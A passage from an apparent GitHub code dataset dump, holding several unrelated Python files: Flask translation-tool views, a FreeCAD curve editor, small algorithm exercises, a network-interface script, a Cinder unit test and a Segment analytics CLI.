flask.Blueprint('main', __name__)\ntemplate_tools.setup_language_context(blueprint)\ntemplate_tools.setup_user_context(blueprint)\nblueprint.before_request(user_tools.check_login)\n\n\nclass HomeView(views.MethodView):\n def dispatch_request(self, *args, language_code=None):\n self.language_code = language_code\n return super().dispatch_request(*args)\n\n def get(self):\n return flask.render_template('home.html', **self.context)\n\n def post(self):\n if self.form.validate():\n application.add_resource(self.form.new_resource_name.data)\n flask.flash('Resource created')\n return flask.redirect(flask.url_for('main.home'))\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'resources': self.resources,\n 'form': self.form,\n }\n\n @cached_property\n def resources(self):\n return application.get_resources()\n\n @cached_property\n def form(self):\n return forms.NewResourceForm()\n\nhome = HomeView.as_view('home')\n\nblueprint.add_url_rule('/', view_func=home)\nblueprint.add_url_rule('/lang//', view_func=home)\n\n\nclass AddLanguageView(views.MethodView):\n\n def post(self):\n if self.form.validate():\n new_language_code = self.form.data['new_language_short']\n application.add_language(\n self.form.data['new_language_name'], new_language_code)\n flask.flash('Language added.')\n return flask.redirect(self.try_replace_language_code(self.form.data['next'], new_language_code))\n else:\n flask.flash('Failed to add language.')\n return flask.redirect(self.form.data['next'])\n\n @cached_property\n def form(self):\n return languages.get_new_form()\n\n def try_replace_language_code(self, next, new_language_code):\n url_adapter = flask._request_ctx_stack.top.url_adapter\n try:\n endpoint, args = url_adapter.match(next, 'GET')\n except werkzeug.exceptions.NotFound:\n return next\n else:\n args['language_code'] = new_language_code\n return flask.url_for(endpoint, **args)\n\n\nblueprint.add_url_rule('/add-language/', view_func=AddLanguageView.as_view('add_language'))\n\n\nclass ResourceView(views.MethodView):\n def dispatch_request(self, *args, language_code=None, resource_pk):\n self.resource_pk = resource_pk\n self.language_code = language_code\n return super().dispatch_request(*args)\n\n def get(self):\n if self.language_code:\n return flask.render_template('resource.html', **self.context)\n else:\n return flask.render_template('resource-no-language.html')\n\n def post(self):\n if self.language_code and self.form.validate():\n po_content = flask.request.files[self.form.po_file.name].read().decode()\n if self.form.data['apply_translations']:\n application.upload_po_file(self.resource_pk, po_content, translated_language_code=self.language_code)\n else:\n application.upload_po_file(self.resource_pk, po_content)\n flask.flash('File uploaded')\n return flask.redirect(\n flask.url_for('main.resource', language_code=self.language_code, resource_pk=self.resource_pk))\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'translated_strings': self.translated_strings,\n 'form': self.form,\n 'resource_pk': self.resource_pk,\n }\n\n @cached_property\n def form(self):\n return forms.PoFileUpload()\n\n @cached_property\n def translated_strings(self):\n return application.get_translated_strings(self.language_code, self.resource_pk)\n\n\nresource = ResourceView.as_view('resource')\nblueprint.add_url_rule('/res//', view_func=resource)\nblueprint.add_url_rule('/lang//res//', view_func=resource)\n\n\nclass TranslatedStringEditor(views.MethodView):\n def dispatch_request(self, *args, language_code, pk):\n self.language_code = language_code\n self.pk = pk\n return super().dispatch_request(*args)\n\n def get(self):\n return flask.render_template('translated_string.html', **self.context)\n\n def post(self):\n if self.form.validate():\n self.form.set_translated_string(self.language_code, self.pk)\n flask.flash('Translation changed')\n return flask.redirect(\n flask.url_for('main.resource',\n language_code=self.language_code,\n resource_pk=self.translated_string.resource_pk)\n )\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'form': self.form,\n 'translated_string': self.translated_string,\n 'resource_pk': self.translated_string.resource_pk,\n }\n\n @cached_property\n def form(self):\n return forms.get_translation_form(self.translated_string)\n\n @cached_property\n def translated_string(self):\n return application.get_translated_string(self.language_code, self.pk)\n\n\nblueprint.add_url_rule('/lang//edit//', view_func=TranslatedStringEditor.as_view('translated_string'))\n\n\nclass PoFileDownload(views.MethodView):\n def get(self, *args, language_code, resource_pk):\n response = flask.make_response(application.get_po_file(language_code, resource_pk))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=translations.po\"\n return response\n\n\nblueprint.add_url_rule('/lang//res//po-file/', view_func=PoFileDownload.as_view('po_file_download'))\n","repo_name":"socialwifi/dila","sub_path":"dila/frontend/flask/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"31173726652","text":"import FreeCAD\nimport FreeCADGui\nimport Part\n\n#import _utils\n\n#import sys\n#from PySide2.QtWidgets import QApplication\n#from PySide2.QtGui import QColor\nfrom pivy import coin\nfrom pivy import graphics\n\nimport sys\nif sys.version_info.major >= 3:\n from importlib import reload\n\ndef midpoint(e):\n p = e.FirstParameter + 0.5 * (e.LastParameter - e.FirstParameter)\n return(e.valueAt(p))\n\ndef subshape_from_sublink(o):\n name = o[1][0]\n if 'Vertex' in name:\n n = eval(name.lstrip('Vertex'))\n return(o[0].Shape.Vertexes[n-1])\n elif 'Edge' in name:\n n = eval(name.lstrip('Edge'))\n return(o[0].Shape.Edges[n-1])\n elif 'Face' in name:\n n = eval(name.lstrip('Face'))\n return(o[0].Shape.Faces[n-1])\n\n#class ConnectionMarker(graphics.Marker):\n #def __init__(self, points):\n #super(ConnectionMarker, self).__init__(points, True)\n\n#class ConnectionPolygon(graphics.Polygon):\n #std_col = \"green\"\n #def __init__(self, markers):\n #super(ConnectionPolygon, self).__init__(\n #sum([m.points for m in markers], []), True)\n #self.markers = markers\n\n #for m in self.markers:\n #m.on_drag.append(self.updatePolygon)\n\n #def updatePolygon(self):\n #self.points = sum([m.points for m in self.markers], [])\n\n #@property\n #def drag_objects(self):\n #return self.markers\n\n #def check_dependency(self):\n #if any([m._delete for m in self.markers]):\n #self.delete()\n\nclass MarkerOnShape(graphics.Marker):\n def __init__(self, points, sh=None):\n super(MarkerOnShape, self).__init__(points, True)\n self.shape = None\n self.sublink = None\n if isinstance(sh,Part.Shape):\n self.shape = sh\n elif isinstance(sh,(tuple,list)):\n self.set_sublink(sh)\n\n def set_sublink(self,sl):\n if isinstance(sl,(tuple,list)):\n self.shape = subshape_from_sublink(sl)\n self.sublink = sl\n elif sl is None:\n self.shape = None\n self.sublink = None\n\n def __repr__(self):\n return(\"MarkerOnShape(%s)\"%self.shape)\n\n def drag(self, mouse_coords, fact=1.):\n if self.enabled:\n pts = self.points\n for i, p in enumerate(pts):\n p[0] = mouse_coords[0] * fact + self._tmp_points[i][0]\n p[1] = mouse_coords[1] * fact + self._tmp_points[i][1]\n p[2] = mouse_coords[2] * fact + self._tmp_points[i][2]\n if self.shape:\n v = Part.Vertex(p[0],p[1],p[2])\n proj = v.distToShape(self.shape)[1][0][1]\n # FreeCAD.Console.PrintMessage(\"%s -> %s\\n\"%(p.getValue(),proj))\n p[0] = proj.x\n p[1] = proj.y\n p[2] = proj.z\n self.points = pts\n for foo in self.on_drag:\n foo()\n\nclass ConnectionLine(graphics.Line):\n def __init__(self, markers, dynamic=True):\n super(ConnectionLine, self).__init__(\n sum([m.points for m in markers], []), dynamic)\n self.markers = markers\n for m in self.markers:\n m.on_drag.append(self.updateLine)\n\n def updateLine(self):\n self.points = sum([m.points for m in self.markers], [])\n\n @property\n def drag_objects(self):\n return self.markers\n\n def check_dependency(self):\n if any([m._delete for m in self.markers]):\n self.delete()\n\nclass LineManip(ConnectionLine):\n def __init__(self, face, edge, par=0.0, scale=1.0):\n super(LineManip, self).__init__([], True)\n self.face = face\n self.edge = edge\n self.tangent = None\n self.p1 = MarkerOnShape([(0,0,0)],edge)\n self.p2 = MarkerOnShape([(1,0,0)])\n self._par = 0\n self._scale = 1\n self.param = par\n self.scale = scale\n\n @property\n def param(self):\n return self._par\n\n @param.setter\n def param(self, par):\n if (par >= self.edge.FirstParameter) and (par <= self.edge.LastParameter):\n self._par = par\n self.p1 = MarkerOnShape([self.edge.valueAt(self._par)],edge)\n tangent = self.edge.tangentAt(self._par) # TODO change tangent to cross-tangent\n tangent.normalize()\n tangent.multiply(1e12)\n l = Part.LineSegment(self.edge.valueAt(self._par).sub(tangent),self.edge.valueAt(self._par).add(tangent))\n self.tangent = l.toShape()\n self.p2 = MarkerOnShape([self.tangent.valueAt(self._scale)],self.tangent)\n else:\n FreeCAD.Console.PrintError(\"Bad parameter value, setting to middle of edge\")\n self._par = self.edge.FirstParameter + 0.5 * (self.edge.LastParameter - self.edge.FirstParameter)\n\n @property\n def scale(self):\n return self._scale\n\n @scale.setter\n def scale(self, sc):\n if abs(sc) >= 1e-7:\n self._scale = sc\n self.p2 = MarkerOnShape([self.tangent.valueAt(self._scale)],self.tangent)\n else:\n FreeCAD.Console.PrintError(\"Scale value too small\")\n self._scale = 1e-7\n\n\nclass BlendSurfEditor(object):\n \"\"\"BlendSurfEditor free-hand editor\n my_editor = InterpoCurveEditor([points],obj)\n obj is the FreeCAD object that will receive\n the curve shape at the end of editing.\n points can be :\n - Vector (free point)\n - (Vector, shape) (point on shape)\"\"\"\n def __init__(self, seg=[]):\n self.segments = list()\n #self.curve = Part.BSplineCurve()\n self.root_inserted = False\n #self.support = None # Not yet implemented\n for p in seg:\n if isinstance(p,FreeCAD.Vector):\n self.points.append(MarkerOnShape([p]))\n elif isinstance(p,(tuple,list)):\n self.points.append(MarkerOnShape([p[0]],p[1]))\n elif isinstance(p,(MarkerOnShape, ConnectionMarker)):\n self.points.append(p)\n else:\n FreeCAD.Console.PrintError(\"InterpoCurveEditor : bad input\")\n # Setup coin objects\n if self.fp:\n self.guidoc = self.fp.ViewObject.Document\n else:\n if not FreeCADGui.ActiveDocument:\n appdoc = FreeCAD.newDocument(\"New\")\n self.guidoc = FreeCADGui.ActiveDocument\n self.view = self.guidoc.ActiveView\n self.rm = self.view.getViewer().getSoRenderManager()\n self.sg = self.view.getSceneGraph()\n self.setup_InteractionSeparator()\n self.update_curve()\n\n def setup_InteractionSeparator(self):\n if self.root_inserted:\n self.sg.removeChild(self.root)\n self.root = graphics.InteractionSeparator(self.rm)\n self.root.setName(\"InteractionSeparator\")\n self.root.pick_radius = 40\n self.root.on_drag.append(self.update_curve)\n # Keyboard callback\n self._controlCB = self.root.events.addEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self.controlCB)\n # populate root node\n self.root += self.points\n self.build_lines()\n self.root += self.lines\n self.root.register()\n self.sg.addChild(self.root)\n self.root_inserted = True\n\n def compute_tangents(self):\n tans = list()\n flags = list()\n for i in range(len(self.points)):\n if isinstance(self.points[i].shape,Part.Face):\n for vec in self.points[i].points:\n u,v = self.points[i].shape.Surface.parameter(FreeCAD.Vector(vec))\n norm = self.points[i].shape.normalAt(u,v)\n cp = self.curve.parameter(FreeCAD.Vector(vec))\n t = self.curve.tangent(cp)[0]\n pl = Part.Plane(FreeCAD.Vector(),norm)\n ci = Part.Geom2d.Circle2d()\n ci.Radius = t.Length * 2\n w = Part.Wire([ci.toShape(pl)])\n f = Part.Face(w)\n #proj = f.project([Part.Vertex(t)])\n proj = Part.Vertex(t).distToShape(f)[1][0][1]\n #pt = proj.Vertexes[0].Point\n #FreeCAD.Console.PrintMessage(\"Projection %s -> %s\\n\"%(t,proj))\n if proj.Length > 1e-7:\n tans.append(proj)\n flags.append(True)\n else:\n tans.append(FreeCAD.Vector(1,0,0))\n flags.append(False)\n else:\n for j in range(len(self.points[i].points)):\n tans.append(FreeCAD.Vector(1,0,0))\n flags.append(False)\n return(tans,flags)\n\n def update_curve(self):\n pts = list()\n for p in self.points:\n pts += p.points\n #FreeCAD.Console.PrintMessage(\"pts :\\n%s\\n\"%str(pts))\n if len(pts) > 1:\n self.curve.interpolate(pts)\n tans, flags = self.compute_tangents()\n if (len(tans) == len(pts)) and (len(flags) == len(pts)):\n self.curve.interpolate(Points=pts, Tangents=tans, TangentFlags=flags)\n if self.fp:\n self.fp.Shape = self.curve.toShape()\n\n def build_lines(self):\n self.lines = list()\n for i in range(len(self.points)-1):\n line = ConnectionLine([self.points[i], self.points[i+1]]) \n line.set_color(\"blue\")\n self.lines.append(line)\n \n def controlCB(self, attr, event_callback):\n event = event_callback.getEvent()\n if event.getState() == event.UP:\n #FreeCAD.Console.PrintMessage(\"Key pressed : %s\\n\"%event.getKey())\n if event.getKey() == ord(\"i\"):\n self.subdivide()\n elif event.getKey() == ord(\"q\"):\n if self.fp:\n self.fp.ViewObject.Proxy.doubleClicked(self.fp.ViewObject)\n else:\n self.quit()\n elif event.getKey() == ord(\"s\"):\n sel = FreeCADGui.Selection.getSelectionEx()\n tup = None\n if len(sel) == 1:\n tup = (sel[0].Object,sel[0].SubElementNames)\n for i in range(len(self.root.selected_objects)):\n if isinstance(self.root.selected_objects[i],MarkerOnShape):\n self.root.selected_objects[i].set_sublink(tup)\n FreeCAD.Console.PrintMessage(\"Snapped to %s\\n\"%str(self.root.selected_objects[i].sublink))\n self.root.selected_objects[i].drag_start()\n self.root.selected_objects[i].drag((0,0,0))\n self.update_curve()\n elif (event.getKey() == 65535) or (event.getKey() == 65288): # Suppr or Backspace\n #FreeCAD.Console.PrintMessage(\"Some objects have been deleted\\n\")\n pts = list()\n for o in self.root.dynamic_objects:\n if isinstance(o,MarkerOnShape):\n pts.append(o)\n self.points = pts\n self.setup_InteractionSeparator()\n self.update_curve()\n \n def subdivide(self):\n # get selected lines and subdivide them\n pts = list()\n new_select = list()\n for o in self.lines:\n #FreeCAD.Console.PrintMessage(\"object %s\\n\"%str(o))\n if isinstance(o,ConnectionLine):\n pts.append(o.markers[0])\n if o in self.root.selected_objects:\n idx = self.lines.index(o)\n FreeCAD.Console.PrintMessage(\"Subdividing line #%d\\n\"%idx)\n p1 = o.markers[0].points[0]\n p2 = o.markers[1].points[0]\n par1 = self.curve.parameter(FreeCAD.Vector(p1))\n par2 = self.curve.parameter(FreeCAD.Vector(p2))\n midpar = (par1+par2)/2.0\n mark = MarkerOnShape([self.curve.value(midpar)])\n pts.append(mark)\n new_select.append(mark)\n pts.append(self.points[-1])\n self.points = pts\n self.setup_InteractionSeparator()\n self.root.selected_objects = new_select\n self.update_curve()\n return(True)\n \n def quit(self):\n self.root.events.removeEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self._controlCB)\n self.root.unregister()\n self.sg.removeChild(self.root)\n self.root_inserted = False\n \n\n\n\ndef get_guide_params():\n sel = FreeCADGui.Selection.getSelectionEx()\n pts = list()\n for s in sel:\n pts.extend(list(zip(s.PickedPoints,s.SubObjects)))\n return(pts)\n\ndef main():\n #obj = FreeCAD.ActiveDocument.addObject(\"Part::Spline\",\"profile\")\n #tups = get_guide_params()\n sel = FreeCADGui.Selection.getSelection()\n ip = BlendSurfEditor(sel)\n FreeCAD.ActiveDocument.recompute()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Planthistories/CurvesWB","sub_path":"freecad/Curves/blendsurf_editor.py","file_name":"blendsurf_editor.py","file_ext":"py","file_size_in_byte":12940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"98"} +{"seq_id":"7510552593","text":"from collections import defaultdict\nclass Solution:\n # 668 ms, 99.52%. Time: O(NlogN). Space: O(N)\n def alertNames(self, keyName: List[str], keyTime: List[str]) -> List[str]:\n \n def is_within_1hr(t1, t2):\n h1, m1 = t1.split(\":\")\n h2, m2 = t2.split(\":\")\n if int(h1) + 1 < int(h2): return False\n if h1 == h2: return True\n return m1 >= m2\n \n records = defaultdict(list)\n for name, time in zip(keyName, keyTime):\n records[name].append(time)\n \n res = []\n for person, record in records.items():\n record.sort()\n\t\t\t# Loop through 2 values at a time and check if they are within 1 hour.\n # eg take index 0, and check index 2, skip one. if within count it\n if any(is_within_1hr(t1, t2) for t1, t2 in zip(record, record[2:])):\n res.append(person)\n return sorted(res)","repo_name":"darren170999/InterviewPreparation","sub_path":"zCompanies/zCoinbase/alertusingsamekeycard3timesormoreinahourperiod.py","file_name":"alertusingsamekeycard3timesormoreinahourperiod.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"6288490970","text":"import re\n\n\ndef max_population(data): \n new_result = []\n \n for item in range(1, len(data)):\n new_result.append((re.findall(r\"((?<=\\,)\\w+(? max_num:\n max_num = new_result[item][int(1)]\n\n for item in new_result:\n if str(max_num) in item:\n item[1] = int(max_num)\n return tuple(item)\n\n\ndata = [\"id,name,poppulation,is_capital\",\n\"3024,eu_kyiv,24834,y\",\n\"3025,eu_volynia,20231,n\",\n\"3026,eu_galych,23745,n\",\n\"4892,me_medina,18038,n\",\n\"4401,af_cairo,18946,y\",\n\"4700,me_tabriz,13421,n\",\n\"4899,me_bagdad,22723,y\",\n\"6600,af_zulu,09720,n\"]\nprint(max_population(data))\n","repo_name":"VolodymyrDzhupyna/python-online-marathon","sub_path":"sprint02/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"14742445388","text":"# coding:utf-8\n\nimport netifaces\nimport json\nimport argparse\n\n\ndef get_interfaces(router):\n res = []\n all_interfaces = netifaces.interfaces()\n for inf in all_interfaces:\n if router in inf:\n res.append(inf)\n return res\n\n\ndef get_adapter_info(interfaces):\n res = []\n for inface in interfaces:\n iface_info = {}\n iface_info['name'] = inface\n iface_info['addresses'] = {}\n\n ipv6_addr = netifaces.ifaddresses(inface)[netifaces.AF_INET6][0]['addr'].split('%')[0]\n iface_info['addresses']['ipv6'] = ipv6_addr\n\n ipv6_mask = netifaces.ifaddresses(inface)[netifaces.AF_INET6][0]['netmask']\n iface_info['addresses']['mask'] = ipv6_mask\n\n mac_addr = netifaces.ifaddresses(inface)[netifaces.AF_PACKET][0]['addr']\n iface_info['addresses']['mac'] = mac_addr\n\n res.append(iface_info)\n return res\n\n\n# python xxx.py --node r1\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--node\", type=str, required=True, help=\"device name\")\n\n # obtain the router name\n router_name = parser.parse_args().node\n\n # obtain the data interfaces\n interfaces = get_interfaces(router_name)\n\n # obtain the interfaces' address information\n iface_info = get_adapter_info(interfaces)\n\n info_json = json.dumps(iface_info)\n\n print(info_json)\n","repo_name":"OucMan/TrafficEngineering","sub_path":"netadapter/test-net-adapter.py","file_name":"test-net-adapter.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"15046899630","text":"class Node:\n def __init__(self, value):\n self.data = value\n self.left = None\n self.right = None\n\n\ndef dfs(root):\n if root:\n dfs(root.left)\n print(root.data)\n dfs(root.right)\n\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\ndfs(root)\n","repo_name":"alamb0/Data-Structures-Algorithms","sub_path":"Algorithms/Tree/DFS/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"27255109580","text":"#libraries imported\nfrom code_gen import EigenData\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = EigenData() #creates instance of class\neigenworms = data.get_eigenworms('EigenWorms.mat') #calls function get_eigenworms() and returns array eigenworms\nfootage = data.get_footage('20150814-All-PNAS2011-DataStitched .mat') #calls function get_footage() and returns dictionary of eigenvalues for the 12 worms\n#class Initial_graphs\nclass Initial_graphs(object):\n #function displays a visualisatoon of the variance\n def variance_modes_function(self):\n count =0 #get first worm\n for wormfootage in footage: #every worm in footage dictionary\n if count == 0: #first worm\n worm = footage[ wormfootage ]\n worm = worm.transpose() #transposes\n firstrow = worm[0] #first frame\n count += 1\n # sort the eigenvalues in descending order\n total_sum_firstworm = np.sum(firstrow) #finds sum of first row\n total_sum_squares = np.sum(np.square(firstrow)) \n eigen_square= np.square(firstrow) #square of each number array\n # compute the total sum of all eigenvalues\n total_var = np.sum(firstrow)\n count2=0 #counts the first 4 four modes\n array_var = [] #creates an array\n sumv=0 #sum of variance captured by 4 components\n for value in eigen_square: #loops in values \n percentage_of_variance = (value / total_sum_squares) #finds percentage of variance for that value\n array_var.append(percentage_of_variance)\n if count2<4: \n sumv = sumv + percentage_of_variance #sum of first 4 modes\n count2+=1 \n array_var = [0.2967,0.5678,0.8313,0.948,0.9887]\n # plot the fraction of variance explained\n x = [1,2,3,4,5]\n plt.plot(x, array_var,'.',markersize=14) #plots the 5 dots\n plt.xticks(range(1, 6)) #values in x axis\n plt.axhline(y=1, color='r', linestyle='-') #line at y=1\n plt.xlabel('K',fontsize=13) #x label\n plt.ylabel(r'$\\sigma^2_K$',fontsize=16) #y label\n plt.show() # display graph\n\n #finds variance percentage at a specific timeframe and displays them as percentages in 2dp\n def variance_percentages(self,k):\n count =0 #get first worm\n for wormfootage in footage:\n if count == 0:\n worm = footage[wormfootage]\n worm = worm.transpose()\n firstrow = worm[k] # timestamp k\n count += 1\n \n print(firstrow) #prints values\n total_sum_firstworm = np.sum(firstrow) #finds sum of first row\n print(\"Total sum:\" ,total_sum_firstworm)\n total_sum_squares = np.sum(np.square(firstrow)) #sum of squares\n print(\"Total sum of squares:\",total_sum_squares)\n eigen_square= np.square(firstrow) #square of each number array\n print(\"Eigenvalues squared:\",eigen_square)\n count2=0 #counts the first 4 four modes\n sumv=0 #sum of variance captured by 4 components\n for value in eigen_square: #loops in values \n percentage_of_variance = (value / total_sum_squares) * 100 #finds percentage of variance for that value\n print(\"Variance percentage in 2dp: {:.2f}%\".format(percentage_of_variance)) #prints\n if count2<4: \n sumv = sumv + percentage_of_variance #sum of first 4 modes\n count2+=1 \n print(sumv)\n #function adds percentages in arrays to find the mean\n def total_variance_percentages(self,s1,s2):\n count =0 #get first worm\n for wormfootage in footage:\n if count == 0:\n worm = footage[wormfootage]\n worm = worm.transpose()\n count += 1\n #arrays that each percentage of component are stored\n k1 = []\n k2 = []\n k3 = []\n k4 = []\n k5 = []\n sum4 = []\n worm = worm[s1:s2] #each 100 values\n for row in worm:\n total_sum_firstworm = np.sum(row)\n #print(\"Total sum:\" ,total_sum_firstworm)\n total_sum_squares = np.sum(np.square(row))\n #print(\"Total sum of squares:\",total_sum_squares)\n eigen_square= np.square(row)\n #print(\"Eigenvalues squared:\",eigen_square)\n count1=0\n count2=0\n\n sumv=0\n #appends in component in the corresponding array\n for value in eigen_square:\n percentage_of_variance = (value / total_sum_squares) * 100\n if count1 == 0:\n k1.append(percentage_of_variance)\n elif count1 == 1:\n k2.append(percentage_of_variance)\n elif count1 == 2:\n k3.append(percentage_of_variance)\n elif count1 == 3:\n k4.append(percentage_of_variance)\n elif count1 == 4:\n k5.append(percentage_of_variance)\n sum4.append(sumv)\n if count2<4:\n sumv = sumv + percentage_of_variance\n count2+=1\n count1+=1\n #finds mean of each 100 numbers\n k1_sum = sum(k1)/100\n #print(\"Average value of k1:\",k1_sum/1000)\n k2_sum = np.sum(k2)/100\n #print(\"Average value of k2:\",k2_sum/1000)\n k3_sum = np.sum(k3)/100\n #print(\"Average value of k3:\",k3_sum/1000)\n k4_sum = np.sum(k4)/100\n #print(\"Average value of k4:\",k4_sum/1000)\n k5_sum = np.sum(k5)/100\n #print(\"Average value of k5:\",k5_sum/1000)\n Ssum4 = np.sum(sum4)/100\n #print(\"Average value of sum4:\",Ssum4/33600)\n return k1_sum,k2_sum,k3_sum,k4_sum,k5_sum,Ssum4\n\n#k indicates the row in eigenvalues -> timestamp dt\nk=0\nInitial_graphs().variance_modes_function()\n#Initial_graphs().variance_percentages(k)\ni=0\ns1=0\ns2=100\narray1 = []\narray2 = []\narray3 = []\narray4 = []\narray5 = []\narray_sum4 = []\nfor i in range(0,336):\n v1,v2,v3,v4,v5,avg4 = Initial_graphs().total_variance_percentages(s1,s2) #finds the mean for each 100 values\n s1+=100\n s2+=100\n #adds mean values to arrays\n array1.append(v1)\n array2.append(v2)\n array3.append(v3)\n array4.append(v4)\n array5.append(v5)\n array_sum4.append(avg4)\n","repo_name":"sc20af/COHEN2-final_year_project","sub_path":"variance_graphs.py","file_name":"variance_graphs.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"24356077718","text":"import mock\n\nfrom cinder import exception\nfrom cinder import test\nfrom cinder.volume.drivers.windows import windows_utils\n\n\nclass WindowsUtilsTestCase(test.TestCase):\n\n def setUp(self):\n super(WindowsUtilsTestCase, self).setUp()\n\n windows_utils.WindowsUtils.__init__ = lambda x: None\n self.wutils = windows_utils.WindowsUtils()\n self.wutils._conn_wmi = mock.Mock()\n self.wutils._conn_cimv2 = mock.MagicMock()\n\n def _test_copy_vhd_disk(self, source_exists=True, copy_failed=False):\n fake_data_file_object = mock.MagicMock()\n fake_data_file_object.Copy.return_value = [int(copy_failed)]\n\n fake_vhd_list = [fake_data_file_object] if source_exists else []\n mock_query = mock.Mock(return_value=fake_vhd_list)\n self.wutils._conn_cimv2.query = mock_query\n\n if not source_exists or copy_failed:\n self.assertRaises(exception.VolumeBackendAPIException,\n self.wutils.copy_vhd_disk,\n mock.sentinel.src,\n mock.sentinel.dest)\n else:\n self.wutils.copy_vhd_disk(mock.sentinel.src, mock.sentinel.dest)\n\n expected_query = (\n \"Select * from CIM_DataFile where Name = '%s'\" %\n mock.sentinel.src)\n mock_query.assert_called_once_with(expected_query)\n fake_data_file_object.Copy.assert_called_with(\n mock.sentinel.dest)\n\n def test_copy_vhd_disk(self):\n self._test_copy_vhd_disk()\n\n def test_copy_vhd_disk_invalid_source(self):\n self._test_copy_vhd_disk(source_exists=False)\n\n def test_copy_vhd_disk_copy_failed(self):\n self._test_copy_vhd_disk(copy_failed=True)\n\n @mock.patch.object(windows_utils, 'wmi', create=True)\n def test_import_wt_disk_exception(self, mock_wmi):\n mock_wmi.x_wmi = Exception\n mock_import_disk = self.wutils._conn_wmi.WT_Disk.ImportWTDisk\n mock_import_disk.side_effect = mock_wmi.x_wmi\n\n self.assertRaises(exception.VolumeBackendAPIException,\n self.wutils.import_wt_disk,\n mock.sentinel.vhd_path,\n mock.sentinel.vol_name)\n mock_import_disk.assert_called_once_with(\n DevicePath=mock.sentinel.vhd_path,\n Description=mock.sentinel.vol_name)\n\n def test_check_if_resize_is_needed_bigger_requested_size(self):\n ret_val = self.wutils.is_resize_needed(\n mock.sentinel.vhd_path, 1, 0)\n self.assertTrue(ret_val)\n\n def test_check_if_resize_is_needed_equal_requested_size(self):\n ret_val = self.wutils.is_resize_needed(\n mock.sentinel.vhd_path, 1, 1)\n self.assertFalse(ret_val)\n\n def test_check_if_resize_is_needed_smaller_requested_size(self):\n self.assertRaises(\n exception.VolumeBackendAPIException,\n self.wutils.is_resize_needed,\n mock.sentinel.vhd_path, 1, 2)\n","repo_name":"TonyChengTW/OpenStack_Liberty_Control","sub_path":"cinder/tests/windows/test_windows_utils.py","file_name":"test_windows_utils.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"42634471652","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/5/30 15:30\n# @Author : PFinal南丞 --type=track --event= [--properties=] [--context=] [--userId=] [--anonymousId=] [--integrations=] [--timestamp=]\n analytics --writeKey= --type=screen --name= [--properties=] [--context=] [--userId=] [--anonymousId=] [--integrations=] [--timestamp=]\n analytics --writeKey= --type=page --name= [--properties=] [--userId=] [--context=] [--integrations=] [--timestamp=]\n analytics --writeKey= --type=identify [--traits=] [--context=] [--userId=] [--anonymousId=] [--integrations=] [--timestamp=]\n analytics --writeKey= --type=group --groupId= [--traits=] [--properties=] [--context=] [--userId=] [--anonymousId=] [--integrations=] [--timestamp=]\n analytics --writeKey= --type=alias --userId= --previousId= [--context=] [--anonymousId=] [--integrations=] [--timestamp=]\n analytics -h | --help\n analytics --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n\"\"\"\nfrom docopt import docopt\nimport analytics\nimport os\nimport json\nimport sys\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='1.0.0')\n\n writeKey = arguments[\"--writeKey\"]\n if not writeKey:\n analytics.write_key = os.getenv('SEGMENT_WRITE_KEY')\n else:\n analytics.write_key = writeKey\n\n userId = arguments[\"--userId\"]\n anonymousId = arguments[\"--anonymousId\"]\n timestamp = arguments[\"--timestamp\"]\n context = arguments[\"--context\"]\n if context:\n context = json.loads(context)\n integrations = arguments[\"--integrations\"]\n if integrations:\n integrations = json.loads(integrations)\n\n msgType = arguments[\"--type\"]\n\n if msgType == \"track\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.track(user_id = userId, anonymous_id=anonymousId, event = arguments[\"--event\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"screen\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.screen(user_id = userId, anonymous_id=anonymousId, name = arguments[\"--name\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"page\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.page(user_id = userId, anonymous_id=anonymousId, name = arguments[\"--name\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"alias\":\n analytics.alias(user_id = userId, previousId=arguments[\"--previousId\"])\n elif msgType == \"group\":\n traits = arguments[\"--traits\"]\n if traits:\n traits = json.loads(traits)\n analytics.group(user_id = userId, anonymous_id=anonymousId, group_id = arguments[\"--groupId\"], traits = traits, context = context, integrations = integrations)\n elif msgType == \"identify\":\n traits = arguments[\"--traits\"]\n if traits:\n traits = json.loads(traits)\n analytics.identify(user_id = userId, anonymous_id=anonymousId, traits = traits, context = context, integrations = integrations)\n else:\n raise Exception('Unknown argument')\n\n 